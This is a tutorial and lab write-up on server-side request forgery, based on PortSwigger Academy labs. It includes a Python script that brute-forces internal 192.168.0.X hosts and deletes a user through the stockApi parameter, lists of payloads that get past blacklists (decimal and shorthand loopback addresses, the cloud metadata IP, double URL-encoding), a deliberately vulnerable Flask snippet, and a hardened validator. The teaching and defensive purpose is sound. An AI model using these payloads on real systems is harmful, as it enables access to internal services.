II. Analyze and exploit Server-side request forgery vulnerabilities (continued)
3. SSRF vulnerability accessing other back-end system
Besides using an SSRF vulnerability to reach the vulnerable server itself, we can use it to reach other back-end systems. These systems are usually not directly reachable from the internet, so to attack them we need their exact hostname or IP address. When we do not know it, we can brute-force a candidate IP range (for example a /24 that the application already talks to) and look for a host whose response differs from the rest.
Basic SSRF lab analysis against another back-end system
Description: The stock check function of the website retrieves data from the intranet and returns it to the user, and it contains an SSRF vulnerability. We know that the intranet has an admin page at /admin on some host in the range 192.168.0.X, port 8080. To solve the lab, we need to exploit the SSRF vulnerability to reach this admin page and delete the carlos user account.
As in the previous lab, the stockApi parameter is sent to the system by POST and its value is a URL; the address it points to is only reachable from the local network.
Confirmed the SSRF vulnerability with the out-of-band DNS lookup technique; the lookup succeeded:
Notice the original address the site passes to its back end: http://192.168.0.1:8080/product/stock/check?productId=1&storeId=1. It points at IP 192.168.0.1 on port 8080, and we already know an admin page exists at a URL of the form http://192.168.0.X:8080/admin. The idea is to brute-force the last octet to find the correct host.
Send the request to Burp Intruder:
Place the payload marker on the position to brute-force. This is the last octet of an IPv4 address, so X ranges from 0 to 255, and that is the payload list we exhaust:
Observe that IP 192.168.0.139 returns status 200 and the response contains the admin page:
Finally, point stockApi at the delete URL on that host to remove the carlos user account. Payload: stockApi=http://192.168.0.139:8080/admin/delete?username=carlos
Labs solved:
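The Intruder run above, as an added script that is not part of the original writeup. It walks the same 256-value payload set, submits each candidate as the stockApi value, and stops at the first host the back end proxies with HTTP 200 (the lab answers 500 for hosts it cannot reach). The lab URL is a placeholder to be replaced with your own instance, and the sender is pluggable so the scan logic can be exercised without a network.

```python
"""Brute-force the last octet of 192.168.0.X through the stockApi SSRF.

Added example reproducing the Intruder run in code. Standard library only.
"""
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterator, Optional, Tuple

# Assumption: replace with the stock-check endpoint of your own lab instance.
LAB_STOCK_URL = "https://YOUR-LAB-ID.web-security-academy.net/product/stock"

# A sender submits one stockApi value and returns (status, body).
Sender = Callable[[str], Tuple[int, str]]


def candidate_urls(port: int = 8080, path: str = "/admin") -> Iterator[str]:
    """The Intruder payload set: http://192.168.0.X:8080/admin for X in 0..255."""
    for x in range(256):
        yield f"http://192.168.0.{x}:{port}{path}"


def urllib_sender(stock_url: str, timeout: float = 10.0) -> Sender:
    """Real sender: POST stockApi=<target> to the lab, as the stock-check form does."""
    def send(target: str) -> Tuple[int, str]:
        body = urllib.parse.urlencode({"stockApi": target}).encode()
        req = urllib.request.Request(stock_url, data=body, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            # The lab answers 500 for hosts the back end cannot reach; keep the status
            # so the caller can tell "unreachable" from "admin page found".
            return err.code, err.read().decode("utf-8", "replace")
    return send


def find_admin_host(send: Sender, marker: Optional[str] = None) -> Optional[str]:
    """Return the first candidate the back end proxies with HTTP 200 (and, if given,
    whose body contains `marker`, e.g. a string taken from the admin page)."""
    for target in candidate_urls():
        status, body = send(target)
        if status == 200 and (marker is None or marker in body):
            return target
    return None


def delete_user_url(admin_url: str, username: str = "carlos") -> str:
    """Build the final stockApi payload: <admin page>/delete?username=<user>."""
    return f"{admin_url.rstrip('/')}/delete?username={username}"


if __name__ == "__main__":
    send = urllib_sender(LAB_STOCK_URL)
    found = find_admin_host(send)
    if found:
        print("admin page at", found)
        status, _ = send(delete_user_url(found))
        print("delete request returned", status)
    else:
        print("no host in 192.168.0.0/24 answered 200 on :8080/admin")
```

Status code alone is enough here because the non-existent hosts produce a server-side connection failure, which the lab surfaces as 500; against a real application, compare response length or a marker string as well, since an internal web server may answer 200 for every path.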
4. SSRF and bypass blacklist-based input filters
Addresses used to reach the local server usually take the form http://localhost or http://127.0.0.1, so a developer may try to block them with a blacklist: a list of strings that are not allowed to appear in the input. For example, the following code:
```python
from flask import Flask, request
import requests

app = Flask(__name__)


@app.route('/ssrf')
def follow_url():
    url = request.args.get('url', '')
    # Blacklist check: a plain substring match on the raw input string
    blacklist = ['127.0.0.1', 'localhost']
    for check in blacklist:
        if check in url:
            return "Attack SSRF detected!"
    # Still vulnerable: the server fetches whatever survives the check
    return requests.get(url).text


if __name__ == '__main__':
    app.run(host="0.0.0.0", port=9999)
```
The website checks whether the blacklisted values 127.0.0.1 and localhost appear in the url parameter and rejects the request if they do, intending to prevent SSRF against the local server. The check is a substring match on the raw string, not on the address the HTTP client will actually connect to, which is why there are many ways to reach the local server while avoiding those strings.
- Bypass with domain names that resolve or redirect to a loopback address
http://spoofed.burpcollaborator.net
http://localtest.me
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://mail.ebc.apple.com (redirects to 127.0.0.6 == localhost)
http://bugbounty.dod.network (redirects to 127.0.0.2 == localhost)
- Bypass with the decimal (integer) form of the IP address
http://2130706433/ = http://127.0.0.1
http://3232235521/ = http://192.168.0.1
http://3232235777/ = http://192.168.1.1
http://2852039166/ = http://169.254.169.254
- Bypass with unusual address forms (shorthand literals accepted by inet_aton; http://0/ is 0.0.0.0, which Linux treats as the local host)
http://0/
http://127.1
http://127.0.1
The system can also block specific keywords (for example admin). This can be bypassed as follows:
- Bypass by URL encoding (the first letter of admin encoded once, then double-encoded)
http://127.0.0.1/%61dmin
http://127.0.0.1/%2561dmin
- Bypass with special characters (enclosed alphanumerics that Unicode normalisation folds back to ASCII after the filter has run)
http://ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ = example.com
// special characters: ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
- Bypass using Unicode
There are many other bypass methods listed in PayloadsAllTheThings.
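To make concrete why the substring blacklist fails, and what a check that survives the address-form and keyword-encoding tricks above looks like, here is an added example that is not part of the original writeup. blacklist_allows() and keyword_allows() mirror the two checks described on this page; legacy_ipv4(), which parses the shorthand literals inet_aton accepts (decimal integer, 127.1, 0x7f.1, octal), and hardened_allows(), which decides on the resolved address rather than on the input string, are mine. Name resolution is injected through a resolver callable so the code runs offline; the default is socket.gethostbyname.

```python
"""Why the substring blacklist fails, and a host-normalising replacement.

Added example. blacklist_allows() and keyword_allows() mirror the checks on this
page; legacy_ipv4() and hardened_allows() are the author's additions.
"""
import ipaddress
import re
import socket
from typing import Callable, Optional, Union
from urllib.parse import unquote, urlsplit

Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
Resolver = Callable[[str], str]  # hostname -> IP string, e.g. socket.gethostbyname

BLACKLIST = ["127.0.0.1", "localhost"]


def blacklist_allows(url: str) -> bool:
    """Layer 1 as in the Flask snippet: substring match on the raw URL."""
    return not any(bad in url for bad in BLACKLIST)


def keyword_allows(url: str, keyword: str = "admin") -> bool:
    """Layer 2 from the lab: case-sensitive substring match for a path keyword."""
    return keyword not in url


def decoded_path(url: str, layers: int) -> str:
    """Percent-decode the path `layers` times: once for the form parser that runs
    before the filter, once more for the back end that fetches the URL."""
    path = urlsplit(url).path
    for _ in range(layers):
        path = unquote(path)
    return path


_PART = re.compile(r"0[xX][0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*")


def legacy_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Parse the shorthand literals BSD inet_aton (hence curl, requests, browsers)
    accepts but ipaddress rejects: 1-4 dot-separated parts, each decimal, octal
    (leading 0) or hex (0x); the last part fills the remaining low bytes.
    Returns None when `host` is not such a literal."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if not _PART.fullmatch(p):
            return None
        base = 16 if p[:2].lower() == "0x" else 8 if p.startswith("0") else 10
        values.append(int(p, base))
    *head, last = values
    tail_bits = 8 * (4 - len(head))
    if any(v > 0xFF for v in head) or last >= 1 << tail_bits:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << tail_bits) | last)


def resolve_target(host: str, resolver: Resolver) -> Address:
    """Turn whatever the URL parser produced into the address a client would dial."""
    try:
        return ipaddress.ip_address(host)          # canonical IPv4 / IPv6 literal
    except ValueError:
        pass
    literal = legacy_ipv4(host)
    if literal is not None:
        return literal                             # 2130706433, 127.1, 0x7f.1, ...
    return ipaddress.ip_address(resolver(host))    # DNS for real hostnames


def is_internal(addr: Address) -> bool:
    """Anything that is not globally routable unicast counts as internal."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                    # ::ffff:127.0.0.1 -> 127.0.0.1
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_unspecified or addr.is_reserved or addr.is_multicast)


def hardened_allows(url: str, resolver: Resolver = socket.gethostbyname) -> bool:
    """Deny-by-default: decide on the resolved address, not on the input string."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    try:
        addr = resolve_target(parts.hostname, resolver)
    except (ValueError, OSError):                  # unparsable host or failed lookup
        return False
    return not is_internal(addr)
```

Two caveats a reviewer would raise even on the hardened version: the check resolves the name once and the HTTP client resolves it again when connecting, so DNS rebinding can still slip a loopback address past it unless the fetch is pinned to the checked IP; and redirects (the first bypass list above) move the target after the check, so the fetch must not follow them, or each hop must be re-checked. An allowlist of permitted hosts is simpler and stronger than any denylist where the set of legitimate targets is known.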
Analysis of SSRF lab with blacklist-based input filter
Description: The stock check function of the website retrieves data from the intranet and returns it to the user, and it contains an SSRF vulnerability. The site has an SSRF defence consisting of two layers of checks. To solve the lab, we need to bypass both, reach the admin page at http://localhost/admin and delete the carlos user account.
As in the previous labs, the stockApi parameter of the stock check function is sent to the system as a URL value via POST.
Check for the SSRF vulnerability; the out-of-band DNS lookup succeeds:
Examining the site's blocking mechanism, we notice that it uses a blacklist to block keywords such as localhost and 127.0.0.1:
We can bypass this step with an alternative loopback form such as http://127.1 or http://127.0.1, which contains neither blacklisted string but still reaches 127.0.0.1.
Access to /admin is also blocked: this second layer again uses a blacklist, this time on the admin keyword. Two ways to bypass it:
- Way 1: change the letter case, for example Admin (the filter is case-sensitive). Payload: stockApi=http://127.0.1/Admin
- Way 2: URL-encode any character of the keyword. The value must be encoded twice, because the POST body is URL-decoded once when the parameter is parsed, before the filter runs; the filter then sees %61dmin, which does not contain admin, and the back end decodes it a second time when it requests the path. Payload: stockApi=http://127.0.1/%25%36%31dmin
Delete the carlos user account and complete the lab:
References
- https://portswigger.net/web-security/ssrf
- https://en.wikipedia.org/wiki/IPv4
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
- https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery
- https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf